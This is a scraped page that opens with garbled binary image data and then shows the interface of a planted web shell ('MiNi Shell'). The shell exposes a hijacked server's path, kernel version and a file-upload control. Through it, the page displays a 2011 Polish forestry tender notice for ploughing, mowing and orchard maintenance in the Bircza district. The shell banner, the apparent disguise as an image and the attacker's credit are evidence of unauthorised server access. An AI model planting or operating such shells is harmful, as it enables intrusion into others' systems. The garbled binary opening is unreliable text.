JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110412/74524-N-2011.html

<p class="kh_header"><b>Bircza: Usługi z zakresu gospodarki łąkowo-rolnej w Nadleśnictwie Bircza w 2011r.</b><br>
<b>Numer ogłoszenia: 74524 - 2011; data zamieszczenia: 12.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Bircza , Stara Bircza 99, 37-740 Bircza, woj. podkarpackie, tel. 016 6725004, 6755343, faks 016 6725004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_bircza</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi z zakresu gospodarki łąkowo-rolnej w Nadleśnictwie Bircza w 2011r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi z zakresu gospodarki łąkowo-rolnej w 2011 r. wykonywane na gruntach administrowanych przez Nadleśnictwo Bircza, znajdujących się w zasięgu terytorialnym Nadleśnictwa Bircza oraz Nadleśnictwa Krasiczyn. Zakres prac obejmuje wykonywanie zabiegów uprawowych na gruntach użytkowanych rolniczo i innych usług rolnictwa: 
1. orka, wykonana pługiem lemieszowym o głębokości 20-30 cm, na powierzchni  20,88 ha
2. bronowanie na krzyż broną zębatą na powierzchni  48,64 ha
3. talerzowanie broną talerzową lub alternatywnie spulchnienie gleby kultywatorem na powierzchni  8,23 ha
4. wysiew nasion zbóż, traw i innych roślin uprawowych, wraz z dowozem nasion z magazynu w Starej Birczy, ewentualnie sadzenie ( rozrzucenie) na uprawianej powierzchni sadzonek topinamburu (ręcznie lub mechanicznie rozsiewaczem) na powierzchni  20,37 ha
5. wysiew nawozów wraz z transportem nawozów z magazynu w Starej Birczy (ręcznie lub mechanicznie rozsiewaczem), na powierzchni  26,63 ha
6. wałowanie (wałem polowym) nowozakładanych użytków zielonych, na powierzchni  11,14 ha
7.  wykaszanie (koszenie) trwałych użytków zielonych (ewentualnie gruntów uprawianych rolniczo) rozdrabniaczem na powierzchni  373,26 ha; wysokość  wykoszenia 5- 10- cm , niedopuszczalne jest stosowanie koszenia okrężnego - od zewnątrz do środka wykaszanej powierzchni. 
8. pielęgnacja sadów owocowych; nawożenie sadzonek nawozem wieloskładnikowym NPK (0,1kg/szt) wraz z dojazdem do miejsca wykonywania prac i transportem nawozów z magazynu w Starej Birczy,  łącznie -285 szt.  Prace obejmują:                    
a) miejscowe rozgrodzenie zabezpieczeń                     
b) podsypanie sadzonek nawozem wraz z przekopaniem gleby wokół sadzonek
c) przywrócenie stanu zabezpieczeń drzewek
9. pielęgnacja sadów owocowych; wykaszanie ręczne chwastów wokół drzewek owocowych grodzonych indywidualnie lub grupowo wraz z dojazdem do miejsca wykonania prac, łącznie -285 szt. Prace obejmują:                 
a) miejscowe rozgrodzenie zabezpieczeń                      
b) wykoszenie chwastów wokół sadzonek na placówkach o wym. 1,5x1,5m
c) przywrócenie stanu zabezpieczeń drzewek..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6. Ustawy Prawo Zamówień Publicznych, polegających na wykonaniu usług zgodnych z przedmiotem niniejszego zamówienia (rozszerzeniu zakresu świadczonych usług) stanowiących do 50 % wartości zamówienia podstawowego. Zamówienia uzupełniające mogą być udzielone w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.10.00.00-1, 77.11.10.00-1, 77.11.20.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy złożą oświadczenie o spełnianiu powyższego warunku. Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy złożą oświadczenie o spełnianiu powyższego warunku. Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty.
Zamawiający informuje, iż do wykonania przedmiotowego zamówienia niezbędny jest następujący sprzęt:
- dla części zamówienia nr 1 (a także  części 1 i 3 albo części  1 i 2): dwa  ciągniki rolnicze, w tym jeden ciągnik dwunapędowy o minimalnej mocy znamionowej silnika 50 kW z przystosowanym do współpracy z nim rozdrabniaczem (np.: MTZ 82, Ursus 1224 ) oraz sprzęt rolniczy typu pług, brony zębate i talerzowe, kultywator, wał polowy, rozsiewacz  ewentualnie siewnik 
- dla części zamówienia nr 2 albo 3: jeden ciągnik rolniczy o minimalnej mocy znamionowej silnika 50 kW z przystosowanymi do współpracy z nimi rozdrabniaczem .
- dla części zamówienia nr 2 i  3: dwa  ciągniki rolnicze o minimalnej mocy znamionowej silnika 50 kW z przystosowanymi do współpracy z nimi dwoma rozdrabniaczami).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy złożą oświadczenie o spełnianiu powyższego warunku. Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy wykażą, iż posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimalną kwotę 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100). Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać ponadto następujące dokumenty i oświadczenia
a) Pełnomocnictwo do złożenia oferty o ile nie wynika z innych dokumentów załączonych przez Wykonawcę. 
b) Wypełniony formularz ofertowy zgodny w treści z wzorem stanowiącym załącznik nr 1 do SIWZ
c) Formularz cenowy oferty wypełniony wg. załączonego wzoru -  załącznik nr 2 do SIWZ
d) Wykaz części zamówienia, które Wykonawca zamierza zlecić do wykonania Podwykonawcom załącznik nr 4 do SIWZ
Uwaga - Zamawiający dopuszcza brak w/w dokumentu traktując to jako jednoznaczne oświadczenie, iż wykonawca wykona zamówienie osobiście, bez udziału podwykonawców. 
e) Pełnomocnictwo podmiotów występujących wspólnie (konsorcjum), jeśli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Rozmiar prac w poszczególnych częściach zamówienia, a tym samym wartość usługi mogą ulec zmianie z przyczyn niezależnych od Zamawiającego (np.: niekorzystne warunku pogodowe, wystąpienie klęsk itp.). Zamawiający zastrzega sobie także możliwość redukcji zakresu prac określonych w SIWZ w przypadku niekorzystnej sytuacji finansowej lub w przypadku wystąpienia zmian warunków przyrodniczych uzasadniających wykonanie tych prac. W takich przypadkach wykonawcy przysługuje wynagrodzenie za faktycznie wykonaną pracę obliczone w oparciu o stawki jednostkowe określone w ofercie. 
2. W przypadku zmiany w trakcie realizacji umowy obowiązującej stawki podatku od towarów i usług (VAT) nastąpi waloryzacja wynagrodzenia umownego proporcjonalnie do zmiany obowiązujących stawek. W takim przypadku wartość wynagrodzenia z tytułu realizacji niniejszej umowy obliczona będzie jako  iloczyn stawek jednostkowych netto podanych w ofercie za wykonanie poszczególnych prac i ich rozmiaru (wartość umowy netto pozostanie niezmienna) powiększona o podatek od towarów i usług, obliczony według stanu na dzień powstania obowiązku podatkowego. 
3. W uzasadnionych przypadkach Zamawiający może zmienić lokalizację prac. Takie zmiany nie mają wpływu na zmianę wartości zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_bircza/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Bircza 
adres: Stara Bircza 99, 37-740 Bircza..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2011 godzina 12:00, miejsce: Nadleśnictwo Bircza adres: Stara Bircza 99, 37-740 Bircza pokój 211 (Sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Warunki wykonywania i finansowania zadania:
Realizacja przedmiotu zamówienia będzie następowała sukcesywnie. Terminy, szczegółowa lokalizacja (okazanie w terenie) i kolejność wykonywania poszczególnych prac wyszczególnionych w punkcie 1, określone zostaną w zleceniach przekazania prac do wykonania sporządzonych przez osoby upoważnione przez Zamawiającego. Odbiór ilościowo- jakościowy wykonanych prac będzie dokonywany przez osoby upoważnione i dokumentowany będzie na druku protokołu odbioru robót. Protokół odbioru robót jest podstawą do wystawienia faktury za wykonaną przez Wykonawcę usługę. Należność za usługę, obliczona na podstawie rozmiaru wykonanych prac i stawek jednostkowych określonych w ofercie, będzie płatna przelewem na konto Wykonawcy w terminie do 30 dni od daty otrzymania faktury. 
2. Zamawiający nie odpowiada za utrudnienia i uszkodzenia sprzętu Wykonawcy, mogące powstać w trakcie realizacji niniejszej umowy, które wynikają z utrudnień terenowych (obecność pojedynczych drzew lub ich pozostałości oraz obiektów infrastruktury). W przypadku wystąpienia utrudnień, o których mowa powyżej, Wykonawca ma prawo pozostawić powierzchnię nie nadającą się do wykoszenia (bez dodatkowych czynności porządkowych) nie wykoszoną, bez konsekwencji odliczenia jej od powierzchni określonej w zleceniu.
3. Wykonawca jest zobowiązany do uprzątnięcia śmieci i innych odpadów z powierzchni, na której wykonywana jest usługa.
4. Przez cały okres realizacji zamówienia Wykonawca Zobowiązany jest posiadać ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności na kwotę określoną w w warunkach udziału w postępowaniu.
5. Szczegółowe terminy realizacji dla poszczególnych części zamówienia wraz z uwagami:
a)  Część zamówienia nr 1:.
Rozpoczęcie: po podpisaniu umowy, 
Zakończenie: do 15.11.2011r.
b)  Część zamówienia nr 2: 
Rozpoczęcie: od 13.06.2011r.
Zakończenie: do 31.07.2011r.
c)	Część zamówienia nr 3: 
Rozpoczęcie: od 13.06.2011r.
Zakończenie: do 31.08.2011r.
Uwaga: wykoszenie gruntów objętych programem rolno środowiskowym (pakiet 3) nastąpić musi w terminie od  01.08.2011 r. do 31.08.2011 r. natomiast wykoszenie pozostałych gruntów w terminie od 13.06.2011 r. do 31.07.2011 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi z zakresu gospodarki łąkowo-rolnej polegające na wykonaniu zabiegów uprawowych, pielęgnacji sadów owocowych oraz wykaszaniu trwałych użytków zielonych (bądź gruntów uprawianych rolniczo) w leśnictwach: Brzuska, Jasienica i  na gruntach w zasięgu Nadleśnictwa Krasiczyn administrowanych przez Nadleśnictwo Bircza,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac: 
1. orka, wykonana pługiem lemieszowym o głębokości 20-30 cm, na powierzchni  20,88 ha
2. bronowanie na krzyż broną zębatą na powierzchni  48,64 ha
3. talerzowanie broną talerzową lub alternatywnie spulchnienie gleby kultywatorem na powierzchni  8,23 ha
4. wysiew nasion zbóż, traw i innych roślin uprawowych, wraz z dowozem nasion z magazynu w Starej Birczy, ewentualnie sadzenie ( rozrzucenie) na uprawianej powierzchni sadzonek topinamburu (ręcznie lub mechanicznie rozsiewaczem) na powierzchni  20,37 ha
5. wysiew nawozów wraz z transportem nawozów z magazynu w Starej Birczy (ręcznie lub mechanicznie rozsiewaczem), na powierzchni  26,63 ha
6. wałowanie (wałem polowym) nowozakładanych użytków zielonych, na powierzchni  11,14 ha
7. wykaszanie (koszenie) trwałych użytków zielonych (ewentualnie gruntów uprawianych rolniczo) rozdrabniaczem na powierzchni  30,24 ha; wysokość  wykoszenia 5- 10- cm , niedopuszczalne jest stosowanie koszenia okrężnego - od zewnątrz do środka wykaszanej powierzchni. 
8. pielęgnacja sadów owocowych; nawożenie sadzonek nawozem wieloskładnikowym NPK (0,1kg/szt) wraz z dojazdem do miejsca wykonywania prac i transportem nawozów z magazynu w Starej Birczy,  łącznie -285 szt.  
9. pielęgnacja sadów owocowych; wykaszanie ręczne chwastów wokół drzewek owocowych grodzonych indywidualnie lub grupowo wraz z dojazdem do miejsca wykonania prac, łącznie -285 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.10.00.00-1, 77.11.10.00-1, 77.11.20.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi z zakresu gospodarki łąkowo-rolnej polegające na  wykaszaniu trwałych użytków zielonych w leśnictwach: Dobrzanka, Sierakośce, Borysławka, Leszczyny, Wojtkówka i Jureczkowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje wykaszanie (koszenie) trwałych użytków zielonych rozdrabniaczem na powierzchni  121,28 ha; wysokość  wykoszenia 5- 10- cm, niedopuszczalne jest stosowanie koszenia okrężnego - od zewnątrz do środka wykaszanej powierzchni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.11.20.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi z zakresu gospodarki łąkowo-rolnej polegające na  wykaszaniu trwałych użytków zielonych w leśnictwie Arłamów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje wykaszanie (koszenie) trwałych użytków zielonych rozdrabniaczem na powierzchni  214,81 ha; wysokość  wykoszenia 5- 10- cm , niedopuszczalne jest stosowanie koszenia okrężnego - od zewnątrz do środka wykaszanej powierzchni. 
W przypadku gruntów w leśnictwie Arłamów o powierzchni ogólnej 104,03 ha,  objętych programem rolnośrodowiskowym (wymagania dla: Pakiet 3 ekstensywne trwałe użytki zielone) zgodnie z  Rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi z dnia 26 lutego 2009 r. w sprawie szczegółowych warunków i trybu przyznawania pomocy finansowej w ramach działania dla Programu rolnośrodowiskowego objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013 (Dz.U. 2009 nr 33 poz. 262) wymagane jest pozostawienie niewykoszonych (w obrębie koszonej powierzchni wskazanych fragmentów) (około 5 % powierzchni, która została odliczona od ogólnej powierzchni usługi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.11.20.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com